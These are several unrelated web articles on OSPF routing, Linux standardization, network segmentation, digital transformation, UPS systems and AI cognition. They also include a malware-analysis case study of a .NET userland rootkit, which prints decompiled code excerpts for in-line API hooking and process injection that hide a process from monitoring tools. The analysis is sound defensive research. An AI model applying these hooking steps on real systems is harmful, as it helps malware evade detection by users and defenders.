Network Types and the DR/BDR

While we are on the topic of router types, we should also talk about what OSPF sees as the different network ‘types’. Depending on the type of network, OSPF will handle the configuration slightly differently. The main difference is whether or not a router is elected as the designated router (DR) and backup designated router (BDR). Before we talk about the DR and BDR I should also point out that each network type can further be classified into either a transit or stub network. Transit networks have 2 or more routers attached to them whereas stub networks only have a single router attached. Loopback interfaces are a great example of stub networks. DO NOT CONFUSE THE NETWORK TYPE WITH THE AREA TYPE! TWO DIFFERENT THINGS!

Point to point and point to multipoint networks do NOT have the concept of a DR and a BDR, whereas broadcast and NBMA networks do. The concept of the designated router is in place to solve a particular problem that multi-access networks bring with them. The big hitter is LSA flooding. Think about a bunch of routers on the same Ethernet segment flooding all of their LSAs to each other, who in turn flood the LSAs to all of the other routers. That’s a lot of unnecessary flooding to share the same information. The second issue DRs and BDRs solve is that of adjacencies. If every router had an adjacency with every other router, that would equate to a lot of adjacencies, which would then equate to unnecessary flooding of router LSAs. To solve this problem, multi-access networks elect a DR that is responsible for representing the entire multi-access network (and all connected routers) as well as for managing the flood process within the multi-access network. Each router on the network will form an adjacency with both the elected DR on a segment as well as the elected BDR. The election of the DR and BDR is based on configured priority, and when not configured, is based on the router’s RID. Taking a look at a subsection of our lab topology, we can see this in action…

While in reality, each of my segments is a multi-access network (Ethernet when not manually configured to be point to point) and will elect a DR and a BDR, this section is truly a multi-access network. Here, router1, router2, and switch1 share a common subnet. If we look at the neighbors from the perspective of each device we can get some insight on the DR and BDR roles…

In this case, we can see that they’ve elected router2 as the DR and switch1 as the BDR. But why wasn’t switch1 picked as the DR since it had a higher RID? Like the RID reconfiguration example we saw in the first post, it’s a matter of timing. And apparently, it’s very, very, very picky about the timing. I was initially confused on the matter so I posted a question about it at network-forum. Deadcow and mellowd took a look at it for me and eventually we determined that it was spanning-tree causing the problem.
To be honest, I’m still not 100% sure why, but since I’m using an SVI that relies on VLANs to be ‘up’ for it to be ‘up’, I must have introduced some delay into the election process which caused switch1 to not be elected as the DR. After enabling ‘spanning-tree portfast trunk’ on the switch interfaces I got the results I was looking for…

OSPF routers on a multi-access subnet ONLY form adjacencies with the DR and the BDR. Adding in a 4th device temporarily, we can see this in action…

In this case, we can see that adjacencies formed only with the DR (switch1) and BDR (router3) on router1… All other routers will show as being in a DROTHER state. If we look at some transactional data (LSU traffic) we can see the DR and BDR in action…

Notice that all routers continue to send hellos to the ‘all OSPF routers’ multicast address of 224.0.0.5. When we get into a transactional situation dealing with LSA updates, we can see that the BDR (router3, 10.0.0.4) is sending its updates to the same address (first red box). However, when non-DR or non-BDR routers reply, they only do so to the 224.0.0.6 address, which is also known as the ‘all DR/BDR routers’ address. In this manner, all of the updates from the DR/BDR still get to all routers, but the responses from the non-DR/BDR routers only go to the DR/BDRs.

LSAs and the link state DB

Now that we’ve discussed areas and router types, let’s talk a little bit about LSAs and the link state database. Since each router is making its own routing decisions, it is imperative that all of the routers in the same area have an identical link state database. This is achieved by neighboring routers telling each other about all of the other LSAs that they know about. The confusion comes in when we start talking about LSAs. After all, taking a look at the link state database doesn’t really appear to tell us a whole heck of a lot about the prefixes we see in the routing table…

In fact, we don’t see anything at all in the link state database output that even looks like a prefix. That’s because we are, once again, just looking at the LSA headers. Let’s talk a little bit about the different LSA types before we dive into how to actually look at them on the router. Let’s just throw each LSA type into this table and then talk about them one at a time…

Router LSA (1) – The router LSA is generated by all routers and lists all of the router’s links, their associated cost, state, and any known OSPF members that exist on that particular interface. These LSAs are only flooded within the area in which they are originated.

Network LSA (2) – The network LSA is generated by the DR of a multi-access network. The LSA contains information about the network, including attached routers, and is flooded only within the area in which it is originated.

Network Summary LSA (3) – This LSA type is originated by ABRs and is sent into a single area to advertise destinations that are reachable outside of that area. This essentially tells all of the routers inside a specific area what other prefixes are available through a specific ABR. Additionally, this LSA type is used to send prefixes available within a specific area into the backbone area (0). Lastly, this LSA type is used to advertise default routes that originate from another OSPF area.

ASBR Summary (4) – This LSA type is used to advertise the location of an ASBR. The destination is not actually a prefix, but rather a specific host address of an ASBR.
AS External (5) – This LSA type is advertised only by ASBRs and advertises either a default route or a prefix that’s accessible outside of the OSPF domain.

Group Membership (6) – Used for multicast OSPF (MOSPF).

NSSA External (7) – We’ll be discussing not so stubby areas (NSSAs) coming up shortly. An NSSA external LSA is used to advertise a destination only within the NSSA area in which the destination originated.

External Attributes (8) – Proposed for carrying BGP info over OSPF. Never implemented.

Opaque (9,10,11) – Used to carry other information that may or may not be used by the actual OSPF routers.

Now that we know the different kinds of LSAs, we can talk about specific area types.

Stub areas

To put it simply, the ABR sitting between a stub area and the backbone area simply advertises a default (all 0’s) route into the stub area using a type 3 (network summary) LSA. The idea here being that to access anything external to the area, you’d need to traverse the ABR. If you need to traverse the ABR, why would all of the routers in the stub area need the specific external routes to tell them to talk to the ABR? Why not just give them one default route to the ABR? The rules for stub areas are…

- ABRs advertise a default route into the stub area in a type 3 network summary LSA
- Do not advertise type 4 LSAs into the stub area
- Do not advertise type 5 LSAs into the stub area
- Stub routers set a specific ‘E-bit’ inside their hellos to 0. OSPF stub routers will ONLY peer with other routers that have this bit set the same way.
- Since we aren’t advertising type 5 LSAs (AS External), ASBRs can NOT exist in a stub area.

Totally Stubby areas

Taking the stub area to the next level, totally stubby areas also block type 3 (network summary) LSAs, with the exception of the default route advertised by the ABR. After all, if you are using a 0’s route through an ABR to get out of the area anyway, why do you need the network summaries from other areas?

Not so Stubby Areas (NSSAs)

NSSAs allow a stub area to have an ASBR inside of it. This would allow a stub area to learn routes from an external source and then advertise them into the OSPF domain. The NSSA LSA has something called the ‘P bit’ inside of it. The P bit determines whether or not the actual type 7 LSA gets distributed out of the stub area. If set to 0, the ABR will not advertise it out into OSPF. If set to 1, the ABR will translate the LSA to a type 5 and flood it throughout the OSPF domain. This option allows you to learn external prefixes only within a given area. This chart sums up the area types and the LSAs that are allowed…

OSPF metric and path determination

The last thing I want to talk about in this post is the OSPF metric and how OSPF routers find the shortest path. OSPF is based on Dijkstra’s shortest path algorithm. While I’m not going to dive into the algorithm itself, we can sum it up by saying the lowest cost to a prefix is the winning path. Cisco has a default interface cost for specific interface types. Basically, unless you set it to something else manually (common), these are the only values that I think you need to know…

Fast Ethernet and faster (100 meg and up) – 1
T1 – 64

The rest of the values in the book are for interface speeds I haven’t dealt with in years (and even then they were old). So in our topology, we have all of them set to a cost of 1. The cost to a particular destination is the sum of the costs of all of the outgoing interfaces on the way to the destination. For instance, if we look at our topology… And then look at the routing table on router1… We can see that most of the routes are learned by OSPF (’O’).
We can also determine it’s OSPF because of the admin distance of the routes (110). The number next to the 110 is what we are interested in here. That number represents the route’s ‘metric’. So doing some stare and compare here we can pretty easily verify what we are seeing… To get to 10.0.0.28/30 we have to go through 4 interfaces: router1’s interface, one of switch1’s interfaces, then either router3’s or router4’s, and then finally router5’s. This is also a good example of how OSPF can insert equal cost paths into the FIB. I’m not going to beat the dead horse here, but I will look at the path to 10.1.1.1/32 quickly since that’s showing 5. The only matter of interest here is that going internally from an interface to a loopback apparently counts as a ‘hop’, hence the metric of 5. So that’s the default metric. The metric can be changed manually per interface using the ‘ip ospf cost <cost>’ interface subcommand. For instance, if we change the cost on router5’s interface facing router6 to 70… We can see that reflected in router1’s FIB… That’s really all there is to it. I’ve officially updated my OSPF post outline to include two other posts where I’ll go through some area and LSA examples as well as spend some time getting comfortable with the OSPF RIB data.
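As a quick footnote to the cost example above, the change on router5 and the check on router1 boil down to something like the following. The sub-interface name here is made up for illustration, so substitute whichever interface actually faces router6.

    router5(config)# interface FastEthernet0/0.56
    router5(config-subif)# ip ospf cost 70

    router1# show ip route 10.0.0.28
    router1# show ip ospf interface brief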
<urn:uuid:280c1244-6c5a-47ca-a03c-e8caa8fefce9>
CC-MAIN-2022-40
https://www.dasblinkenlichten.com/ospf-finding-the-best-path/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00221.warc.gz
en
0.938262
3,767
2.5625
3
Standardized hardware, the advent of cloud and other virtual platforms, and the low cost of Linux have led the Unix world down the path of standardization under open source software. When originally developed, commercial Unix solutions such as Solaris, HP-UX, AIX, and others were custom built to accommodate proprietary hardware configurations using proprietary drivers. It is no longer cost-effective for commercial concerns to develop their own OS. And, as the industry embraces standardization and common platforms, commercial Unix platforms will soon cease to exist. Open source has permitted the best ideas from the various commercial platforms to be integrated into one standard operating system. Large commercial environments have also taken a containerized approach to software deployments, and OS standardization is the cornerstone of such deployments. Proprietary operating system development customarily involved the development of alternative processes and management tools such as “Smitty” in AIX, or “Management Console” in Solaris, and other processes that deviated from more common approaches. Unfortunately, this forced system administrators to learn multiple tools and methods for doing virtually the same thing. Each commercial deviation from common approaches caused downstream changes in other software that was installed on servers. Directory changes, tools used to manage network connections, or other software had to be modified to work properly on each variant. This took focus away from developing best practices and standards that were common to all Unix platforms. Through open source software, these deviations were normalized, and the best methods have been incorporated into the Linux operating system. The downside of Linux as open source software is that, in most cases, there is only community support to resolve any issues or vulnerabilities in software and supporting libraries. However, the fact that the open source community has a roughly 10-year track record of quickly responding to reported vulnerabilities has helped foster considerable confidence in the Linux operating system. With commercial Unix variants, the source code and libraries are all custom-developed and underwritten by the company that delivers them. For large commercial organizations, even though that security comes at a premium, it has traditionally been considered worthwhile. The recent acquisition of Red Hat by IBM brings significant credibility to the open source software on which it is built, and this indicates a further trend towards standardization of the operating system to Linux.

How Standardization Simplifies Access

One of the foremost benefits inherent in common platforms and standardized operating systems is consensus and standardization of access and asset models in all enterprises. Once a standard method is agreed upon, it will be possible to focus more effort on securing systems and standardizing access to them. Resources that were previously focused on esoteric development threads can be rededicated to developing common access policies and collecting asset data to strengthen their security program. With a common operating system such as Linux, it is possible to deliver significant return on investment from BeyondTrust’s Endpoint Privilege Management solution for Unix and Linux servers, and the rest of our suite of products.
One alternative use for our Unix/Linux server solution is to take advantage of the trusted agent nature of a deployment and to use the agents to collect consistent data from assets within the network. Another use would be to leverage the solution’s infrastructure as a gateway into any corporate environment where access to any resource is granted based upon the conditions desired by the customer. Focusing on a common operating system provides an opportunity to develop standards among tools and software and to introduce common points of conditional access into any environment. As the presence of commercial Unix variants begins to diminish due to standardization and consensus among consumers, there lies an opportunity to further expand the same controls that govern privileged access to the broader corporate environment. To learn how BeyondTrust and our extensible suite of privileged access solutions can help your organization’s journey toward audit and regulatory compliance, and secure access at any level, contact us.

Chad Erbe, Professional Services Architect, BeyondTrust

Chad Erbe is a Certified Information Systems Security Professional (CISSP) with nearly 30 years’ experience in a Unix/Linux administration role. Chad has worked in DoD high-security environments, manufacturing, and with large financial services companies throughout his career. This broad experience has led him to an architectural role with BeyondTrust, where he focuses on Privileged Access Management, particularly in the Unix suite of products. Chad also maintains his PCI ASV certification from the PCI council.
<urn:uuid:0a302e62-d619-44dd-9833-b03f10f0bbc0>
CC-MAIN-2022-40
https://www.beyondtrust.com/blog/entry/e-pluribus-unix-out-of-many-linux
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00221.warc.gz
en
0.954526
888
3.0625
3
Macro-segmentation is another term for traditional network segmentation. The goal of macro-segmentation is to break up a network into multiple discrete chunks to support business needs. One example of a common use of macro-segmentation is the isolation of development and production environments. Applications currently under development are likely to contain exploitable vulnerabilities or other issues, making them a potential threat to enterprise security or the functionality of the rest of the network. Segmenting the development network off from the production network enables untrusted applications to be tested without posing a risk to the organization’s network stability and ability to operate.

Macro-segmentation is often implemented as an overlay on an organization’s physical network infrastructure. This is accomplished using a combination of firewalls and virtual local area networks (VLANs). A VLAN is a virtualized network that defines how traffic should be routed over the physical network. This means that, if two systems are on different VLANs, it may not be possible for traffic to be routed directly between them. Instead, the VLANs are configured so that all traffic between VLANs must first pass through a firewall. This makes it possible for the firewall to enforce boundaries between VLANs – i.e. block any traffic that attempts to cross a VLAN boundary without authorization – and perform security inspection and enforcement of access control policies.

Macro-segmentation and micro-segmentation are both methods of dividing an organization’s network into sections, and both can provide a number of benefits. However, macro-segmentation and micro-segmentation policies are very different. Macro-segmentation transforms an organization’s network from a monolith into a collection of discrete subnets, which provides a number of advantages to an organization.

Macro-segmentation uses internal network firewalls together with VLANs to enforce segment boundaries and perform content inspection of traffic flowing across those boundaries. This provides a number of different advantages to an organization and is likely a critical component of a company’s data security and regulatory compliance strategy. However, organizations must also consider the usability of their network infrastructure when designing and implementing a strategy for deploying macro-segmentation within their networks. If all internal network traffic crossing segment boundaries will be forced to pass through internal network firewalls, then organizations need firewalls with high throughput and robust security inspection capabilities in order to maximize both network performance and security.

Check Point’s security solutions enable organizations to implement effective macro-segmentation through their entire network infrastructure. Check Point next-generation firewalls (NGFWs) provide robust security and high throughput for on-premises infrastructure, while Check Point CloudGuard provides cloud-native visibility and security solutions for an organization’s cloud-based deployments. To see these solutions in action, request demos of Check Point NGFW and CloudGuard Infrastructure as a Service (IaaS) solutions.
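As a generic illustration of the VLAN-plus-firewall mechanism described above (vendor-neutral, with made-up names and addressing, and not a Check Point configuration), a macro-segmented boundary between a development segment and a production segment might be sketched like this:

    ! Switch: two VLANs, with no inter-VLAN routing performed on the switch itself
    vlan 10
     name development
    vlan 20
     name production

    ! The firewall owns the gateway for each VLAN, so every packet crossing
    ! the development/production boundary hits the firewall policy, e.g.:
    !  permit tcp 10.10.0.0/24 -> 10.20.0.10 port 443   (allowed application traffic)
    !  deny   ip  10.10.0.0/24 -> 10.20.0.0/24          (everything else)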
<urn:uuid:e5e4a7b9-fe04-4fb8-8235-4941997b52df>
CC-MAIN-2022-40
https://www.checkpoint.com/cyber-hub/network-security/what-is-macro-segmentation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00221.warc.gz
en
0.916028
613
2.953125
3
Rootkits are tools and techniques used to hide (potentially malicious) modules from being noticed by system monitoring. Many people, hearing the word “rootkit”, immediately think of techniques applied in kernel mode, like IDT (Interrupt Descriptor Table) hooking, SSDT (System Service Dispatch Table) hooking, DKOM (Direct Kernel Object Manipulation), etc. But rootkits also appear in a simpler, user-mode flavor. They are not as stealthy as kernel-mode rootkits, but due to their simplicity of implementation they are much more widespread. That’s why it is good to know how they work. In this article, we will have a case study of a simple userland rootkit that uses a technique of API redirection in order to hide its own presence from popular monitoring tools.

//special thanks to @MalwareHunterTeam

The rootkit code

This malware is written in .NET and is not obfuscated, which means we can decompile it easily with a decompiler like dnSpy. As we can see in the code, it hooks 3 popular monitoring applications: Process Explorer (procexp), ProcessHacker and Windows Task Manager (taskmgr):

Let’s try to run this malware under dnSpy and observe its behavior under Process Explorer. The sample has been named malware.exe. At the beginning it is visible, like any other process:

...but after executing the hooking routine, it just disappears from the list:

Attaching a debugger to Process Explorer, we can see that some of the API functions, e.g. NtOpenProcess, start in an atypical way, with a jump to some different memory page:

The redirection leads to the injected code:

It is placed in an added memory page with full access rights:

We can dump this page and open it in IDA, getting a view of 3 functions:

The code of the first function begins at offset 0x60:

The space before is filled with some other data that will be discussed in a second part of the article.

Rootkit implementation

Let’s have a look at the implementation details now. As we saw before, hooking is executed in a function HookApplication. Looking at the beginning of this function we can confirm that the rootkit’s role is to install in-line hooks on particular API functions: NtReadVirtualMemory, NtOpenProcess, NtQuerySystemInformation. Those functions are imported from ntdll.dll. Let’s have a look at what is required in order to implement such a simple rootkit. The original decompiled class is available here: ROOT1.cs.

Preparing the data

First, the malware needs to know the base address where ntdll.dll is loaded in the space of the attacked process. The base is fetched by the function GetModuleBaseAddress, which works by enumerating the modules loaded within the examined process (using Module32First / Module32Next). Having the module base, the malware needs to know the addresses of the functions that are going to be overwritten. GetRemoteProcAddressManual searches for those addresses in the export table of the found module.
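Before walking through the code, it helps to spell out what “overwritten” means here: the first 5 bytes of each target function get replaced with a relative JMP to the detour. The snippet below is an illustrative sketch in C# (the method and variable names are mine, not the sample’s), showing how such a patch is typically built; note that the 4 bytes after the 0xE9 opcode hold a relative offset, computed from the end of the 5-byte instruction.

    // Illustrative only - not the sample's code.
    // Builds the 5-byte patch (E9 + rel32) that redirects a hooked
    // function to a detour: rel32 = detour - (hooked function + 5).
    static byte[] BuildJmpPatch(uint hookedFunctionAddress, uint detourAddress)
    {
        byte[] patch = new byte[5];
        patch[0] = 0xE9; // JMP rel32 opcode (decimal 233)
        int rel32 = unchecked((int)(detourAddress - (hookedFunctionAddress + 5)));
        BitConverter.GetBytes(rel32).CopyTo(patch, 1);
        return patch; // written over the target function with WriteProcessMemory
    }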
Fetched addresses are saved in an array:

//fetch addresses of imported functions:
func_to_be_hooked[0] = (uint)((int)ROOT1.RemoteGetProcAddressManual(intPtr, (uint)((int)ROOT1.GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtReadVirtualMemory") );
func_to_be_hooked[1] = (uint)((int)ROOT1.RemoteGetProcAddressManual(intPtr, (uint)((int)ROOT1.GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtOpenProcess") );
func_to_be_hooked[2] = (uint)((int)ROOT1.RemoteGetProcAddressManual(intPtr, (uint)((int)ROOT1.GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtQuerySystemInformation") );

Code from the beginning of those functions is being read and stored in buffers:

//copy original functions' code (24 bytes):
original_func_code[0] = ROOT1.ReadMemoryByte(intPtr, (IntPtr)((long)((ulong)func_to_be_hooked[0])), 24u);
original_func_code[1] = ROOT1.ReadMemoryByte(intPtr, (IntPtr)((long)((ulong)func_to_be_hooked[1])), 24u);
original_func_code[2] = ROOT1.ReadMemoryByte(intPtr, (IntPtr)((long)((ulong)func_to_be_hooked[2])), 24u);

The small, 5-byte long array will be used to prepare a jump. The first byte, 233, is 0xE9 in hex and represents the opcode of the JMP instruction. The other 4 bytes will be filled in so that execution is redirected to the appropriate detour function:

Another array contains the prepared detour functions in the form of shellcodes. The shellcodes are stored as arrays of decimal numbers:

In order to analyze the details, we can dump each shellcode to a binary form and load it in IDA. For example, the resulting pseudocode of the detour function of NtOpenProcess is:

So, what does this detour function do? Very simple filtering: “if someone asks about the malware, tell them that it’s not there. But if someone asks about something else, tell the truth”.

The other filters, applied on NtReadVirtualMemory and NtQuerySystemInformation (for SYSTEM_INFORMATION_CLASS types: 5 = SystemProcessInformation, 16 = SystemHandleInformation), manipulate, respectively, reading memory of the hooked process and reading information about all the processes. Of course, the filters must know how to identify the malicious process that wants to remain hidden. In this rootkit it is identified by the process ID, so it needs to be fetched and saved in the data that is injected along with the shellcode. The detour function of NtReadVirtualMemory will also call the functions GetProcessId and GetCurrentProcessId from inside in order to apply filtering, so their addresses need to be fetched and saved as well:

getProcId_ptr = (uint)((int)ROOT1.RemoteGetProcAddressManual(intPtr, (uint)((int)ROOT1.GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetProcessId") );
getCuttentProcId_ptr = (uint)((int)ROOT1.RemoteGetProcAddressManual(intPtr, (uint)((int)ROOT1.GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetCurrentProcessId") );

Putting it all together

All the required elements must be put together in a proper way. First, the malware allocates a new memory area and copies all the elements in order:

BitConverter.GetBytes(getProcId_ptr).CopyTo(array, 0);
BitConverter.GetBytes(getCuttentProcId_ptr).CopyTo(array, 4);
//...
// copy the current process ID
BitConverter.GetBytes(Process.GetCurrentProcess().Id).CopyTo(array, 8);
//...
// copy the original functions' addresses:
BitConverter.GetBytes(func_to_be_hooked[0]).CopyTo(array, 12);
BitConverter.GetBytes(func_to_be_hooked[1]).CopyTo(array, 16);
BitConverter.GetBytes(func_to_be_hooked[2]).CopyTo(array, 20);
//...
//copy the code of original functions:
original_func_code[0].CopyTo(array, 24);
original_func_code[1].CopyTo(array, 48);
original_func_code[2].CopyTo(array, 72);

After this prolog, the three shellcodes are copied into the same memory page, and the page is injected into the attacked process. Finally, the beginning of each attacked function is patched with a jump redirecting to the appropriate detour function within the injected page.

Bugs and Limitations

The basic functionality of a rootkit has been achieved here; however, this code also contains some bugs and limitations. For example, it causes an application to crash if the functions have already been hooked (for example, in the case where the malware has been deployed a second time). It is caused by the fact that the hook also needs a copy of the original function in order to work. The hooking function assumes that the code in the memory of ntdll.dll is always the original one, and it copies it to the required buffer (rather than copying it from the raw image of ntdll.dll). Of course this assumption is valid only in the optimistic case, and it fails if the function was hooked before.

There are also many limitations, for example:

- the hooking function is deployed only at the beginning of the execution, so if we start a monitoring program while the malware is already running, we can still see the malware
- the set of hooked applications is small
- we can still attach to the malware via a debugger or view it with any tool that is not considered by the authors
- the implemented code works only for 32-bit applications

Conclusion

The demonstrated rootkit is very simple, probably created by a novice. However, it allows us to illustrate very well the basic idea behind API hooking and how it can be used in order to hide a process.

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going into the details of malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.
<urn:uuid:2160c7d5-435a-43fd-9356-c1efa16cfa2e>
CC-MAIN-2022-40
https://www.malwarebytes.com/blog/news/2016/12/simple-userland-rootkit-a-case-study
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00221.warc.gz
en
0.832702
2,234
2.953125
3
Almost all businesses are going through digital transformation today, and there are several tools that are helping businesses to undergo this transformation efficiently. FREMONT, CA: When it comes to digital transformation, technology is almost often mentioned first. Whether it's the Internet of Things (IoT) or Artificial Intelligence (AI), technology is transforming the way businesses operate all around the world. While there's no denying that technology is an integral part of digital transformation, there are other important factors to consider before embarking on a digital transformation strategy. Identifying value-driven business objectives and cultivating a culture of change and collaboration are among them. Four most common tools for digital transformation are: Internet of Things (IoT) IoT technology provides unprecedented access to both products and processes for manufacturers. Industrial IoT technology is being used by companies to acquire a better knowledge of their operations on a global and industrial level. Manufacturers are accomplishing key digital transformation objectives like better productivity, flexibility to respond rapidly to market and consumer demands, and innovation across their goods and services, thanks to greater insights and analytics from IoT. The method of constructing an object one thin layer at a time is known as additive manufacturing or 3-D printing. Additive manufacturing has ramifications across the value chain, not only in manufacturing, as industrial firms seek efficiency. If consumers or field operators may print replacement components for a machine, for example, this allows for more efficient, seamless customer service, reduced downtime, and cheaper servicing costs. Manufacturing firms, particularly discrete and process-oriented firms, have been reticent to embrace the cloud. There are various reasons for this hesitancy, but with recent improvements in cloud technology, those fears are dissipating. Most digital transformation programs make use of the cloud because it provides better flexibility, agility, and scalability throughout a business. Mobile technologies offer a plethora of benefits to manufacturing and industrial businesses, particularly with the advent of 5G capabilities. In many ways, mobile is a basic technology that allows for the development of other game-changing technologies. For example, shop floor employees can use Augmented Reality to monitor machine data points, field service technicians can use AR to get interactive, real-time instruction from specialists at Headquarters to fix an industrial asset, and engineers can use AR to study CAD drawings on the go. There will be rippling effects throughout the industrial business as mobile becomes even more powerful with 5G.
<urn:uuid:015fb7a6-751d-4f86-95d1-577761893506>
CC-MAIN-2022-40
https://www.cioadvisorapac.com/news/four-most-common-tools-for-digital-transformation-nwid-2691.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00221.warc.gz
en
0.936019
501
2.5625
3
Certain industries require constant, uninterrupted power. These industries include government, IT, transportation, and financial services. When power is needed continuously, it’s essential to have an Uninterruptible Power Supply, otherwise known as a UPS. These services are able to provide a continuous flow of power through any size of infrastructure. There are two types of UPS systems; centralized and rack-mount. It’s important to determine which type of UPS provider is right for you and your organizational needs. While the two providers have the same goal, namely the endless flow of power, especially during times of usual power troubles, they go about reaching that goal in different ways. Both rack-mount and centralized UPS systems have features that differentiate them from one another. In order to choose the system that is best for your purposes, you will want to understand the differences, as well as the advantages and disadvantages of each. With centralized UPS systems, there are a couple of UPSs near the perimeter of the server room or in a nearby independent location. They are basically one large centerpoint that makes up the entire network of an organization. Many organizations choose a centralized UPS system for a variety of reasons. They can be large and are able to hold multiple components, making them a versatile option. Along with their larger size, they are incredibly reliable and have a great response time. When some sort of overload occurs, centralized systems are able to take on and respond properly to excessive currents. Another benefit of a centralized UPS system is that they are constantly monitored to ensure proper functioning. That means if something does happen to go wrong, the issue will be discovered and addressed right away. These systems can be a great option for many organizations. They are consistent, reliable, and stable. Running online, they are able to stay on task with no power disruptions. While there are multiple advantages to the centralized UPS system, there are also a number of disadvantages that could give you pause before choosing this option. Centralized systems require a lot of energy to set up and run, making them a non-eco-friendly option. Due to the excessive energy used by these systems, the cost to run and obtain power from them seems astronomical. Not only that, but centralized systems need another high-voltage system to run properly, or multiple runs with low-voltage. Again, these are costly and excessive features that make them a poor choice for many organizations. Instead of having one central system, rack-mount UPS systems in or adjacent to the server rack, which means that every server has the UPS hardware connected. Instead of having a centralized system that works in a certain area, a rack-mount UPS is a continual system with hardware throughout. This is optimal because if there is an issue with one area, the rest will continue to work. With a centralized UPS system, if one system goes out, the whole thing goes out. Rack-mount UPS systems are regularly monitored, with any issues discovered right away. If anything goes out, only one area goes out and will be addressed quickly. These systems are smaller than the centralized ones and cost a lot less, too. They work well due to the many small servers. The short distance between the servers leads to consistent power and reduced risks. Their small size makes them easy to set up, move, and reinstall as needed. 
The small size makes rack-mount UPS systems less energy efficient than centralized ones. They run at a lower percentage capacity and cause waste and redundancy. Rack-mount UPS tends to be managed inefficiently due to the servers and the need for IT. However, rack-mounts are still the ideal solution for networking and server applications. By taking care of the cooling of hardware components in the rack, they provide a seamless, streamlined mode for consistent power.
<urn:uuid:8619bf6d-b003-4e14-9b96-65c1c0a4c1b4>
CC-MAIN-2022-40
https://www.hcienergy.com/blog/should-i-install-a-rack-mount-ups-or-a-centralized-ups
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00221.warc.gz
en
0.965819
801
2.59375
3
Human and Computer Cognition In my mind, the future is not in how we interact with computers, but how computers interact with us, and how lifelike we can make the series of connected artificial intelligence that will become a part of our daily lives. What do I mean by Artificial Intelligence? My view of AI is a program capable of some level of autonomy and intelligence, not a super-intelligent system of the sort Elon Musk seems to fear appearing in the near future. That level of intelligence, a true simulation of the human mind, is probably impossible. Of course, that doesn’t mean that our machines do not and will not ever have any degree of intelligence. In the words of Alan Turing, “May not machines carry out something which ought to be described as thinking but which is very different from what a man does?” That is, just because a computer’s thought won’t resemble that of a human doesn’t mean that it won’t be, on some level, intelligent. Machine intelligence is already superior to human intelligence in recall, math, and logic, so we should see it as a parallel to human intelligence rather than a replacement for it. What will that look like? Already people are becoming accustomed to the ease of use an intelligent system can provide. After just a few days of using the Amazon Echo, a voice-enabled wireless speaker, trying to change music with anything else feels clunky and unusable by comparison. In the future, we will likely see technologies like this extended onto entire houses, with interconnected appliances controlled by a user’s voice and capable of learning from that user’s routines and daily actions. Obviously privacy and security are major concerns, but not the focus here. As part of my summer internship, I was tasked with attempting to fly a small consumer drone using an $800 cognitive headset. Weeks of experimenting with third party software ended with me only able to direct the drone forward and backward, and not with any real precision. Other attempts at cognitive control of remote vehicles seem to have been largely successful only when the pilot was trained in meditation or other cognitive discipline. I did have the chance to demonstrate the headset on a coworker’s young son, and he had no difficulty at all using multiple inputs to interact with a simulated object. While the technological limitations are clearly the largest hurdle that still needs to be overcome, the mental limitations of the user cannot be disregarded. Perhaps younger generations, growing up with easy access to this technology, will have an easier time interacting with it, but either way, I believe that widespread cognitive control is still many years away. Can Cable Contribute? Most intelligent products today are dependent on an internet connection. The Amazon Echo, for example, quickly becomes a fancy paperweight without a constant, strong connection. Any additional connected device will only increase the homeowner’s bandwidth usage. If these intelligent devices eventually achieve mass adoption, we will need much more powerful and reliable networks than we have today. The Big Picture Artificial intelligence has the potential to radically improve our standard of living across the board. Robots are already replacing humans in menial production tasks, so why couldn’t an AI eventually replace an accountant or data analyst? 
The obvious fear this sort of thinking creates is that we eventually end up in a world similar to that envisioned by Aldous Huxley in his famous novel “Brave New World,” one in which humanity has become a race of technicians, maintaining machines that produce their art and music. Personally, I don’t think we have anything to fear, at least in terms of our total replacement by machines. In the words of Thomas J. Watson Jr, the namesake of IBM’s famous Watson supercomputer, “Computing will never rob man of his initiative or replace the need for creative thinking. By freeing man from the more menial or repetitive forms of thinking, computers will actually increase the opportunities for the full use of human reason.” Artificial intelligence will never be able to fully replace our creativity, spontaneity, and compassion, much in the same way that no human will ever have the same instant recall and data analysis abilities of a powerful computer. As such, the AI of the future will work in concert with us, its unparalleled computational power combined with our creativity and problem solving. Sean Fernandes is currently in his third year of undergraduate studies at the University of British Columbia majoring in Cognitive Systems, a mixture of Computer Science, Psychology, and Philosophy, exposing him to a number of perspectives on the future of our interactions with computers and their implications.
<urn:uuid:7e14364b-3fec-4c0d-aeda-853874df6351>
CC-MAIN-2022-40
https://www.cablelabs.com/blog/human-computer-cognition
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00421.warc.gz
en
0.951294
957
2.75
3
